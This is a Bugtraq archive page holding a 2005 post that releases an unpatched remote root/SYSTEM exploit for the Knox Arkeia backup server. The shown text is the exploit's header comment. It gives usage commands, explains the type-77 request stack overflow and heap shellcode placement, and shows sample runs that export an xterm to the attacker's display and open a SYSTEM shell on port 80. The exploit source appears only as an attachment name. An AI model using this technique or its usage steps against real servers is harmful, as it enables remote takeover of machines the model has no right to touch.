Bugtraq mailing list archives
Knox Arkeia remote root/system exploit
From: "John Doe" <guldens111 () hotmail com>
Date: Fri, 18 Feb 2005 11:29:28 -0500
0day cuz i'm bored /* * Knox Arkeia Server Backup * arkeiad local/remote root exploit * Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE * Works up to current version 5.3.x * * --------------- * * Linux x86: * ./arksink2 <arkeia_host> <target_type> <display> * * Exports an xterm to the box of your choosing. Make sure to "xhost +" on * the box you're exporting to. ** A stack overflow is in the processing of a type 77 request. EIP is actually
* overwritten at 64 bytes, but the trailing NULL scrambled a pointer so we* have to write past EIP and insert a "safe" value. Put this value behind your
* NOP+sc return address so it doesn't mess with the sled. ** Since the buffer is so small, we initially send an invalid packet that ends * up on the heap a second before the overflow happens. If it is a high traffic * Arkeia server the heap might be a bit volatile, so play around with putting * nops+sc after the overwritten pointer. The heap method avoids non-exec stack
* protection, however. * * Includes targets for RH8 and RH7.2 * * [user@host user]$ ./prog 192.168.1.2 1 192.168.1.1:0 * [*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit * [*] Attacking LINUX system * [*] Exporting xterm to 192.168.1.1:0 * [*] Connected to 192.168.1.2:617 NOP+shellcode socket * [*] Connected to 192.168.1.2:617 overflow socket * [*] Sending nops+shellcode * [*] Done, sleeping * [*] Done, check for xterm * * * --------------- * * Windows x86: * ./prog <host> <target> <offset> * * Spawns a shell on port 80 of the remote host ** EIP is overwritten beginning with the 25th byte after the header. Since Windows * is little endian and has the heap mapped to 0x00XXXXXX we can avoid having to * write an extra null past EIP. Another advantage here is that we can put all our * nops and shellcode in the same packet, but after the NULL. They will not be copied * onto the stack (and therefore not munge the pointer after it) but will remain * in memory as a raw packet. Fire up ollydbg, search for your nops and voila.
* * [user@host user]$ ./arksink2 192.168.1.2 3 0 * [*] Knox Arkeia <= v5.3.x remote SYSTEM exploit * [*] Attacking Windows system * [*] Spawning shell on 192.168.1.2:80 * [*] Connected to 192.168.1.2:617 overflow socket * [*] Sending overflow * [*] Attempting to get remote shell, try #0 * [!] connect: Resolver Error 0 (no error) * [*] Attempting to get remote shell, try #1 * [!] connect: Resolver Error 0 (no error) * [*] Attempting to get remote shell, try #2 * [!] connect: Resolver Error 0 (no error) * [*] Attempting to get remote shell, try #3 * [!] connect: Resolver Error 0 (no error) * [*] Attempting to get remote shell, try #4 * [*] Success, enjoy * Microsoft Windows 2000 [Version 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\WINNT\system32>whoami * whoami * SYSTEM * * C:\WINNT\system32> * * * --------------- * */ _________________________________________________________________Is your PC infected? Get a FREE online computer virus scan from McAfee® Security. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963
Attachment:
arksink2.c
Description:
Current thread:
- Knox Arkeia remote root/system exploit John Doe (Feb 19)
- Re: Knox Arkeia remote root/system exploit H D Moore (Feb 21)
- <Possible follow-ups>
- Re: Knox Arkeia remote root/system exploit Arnaud Spicht (Feb 23)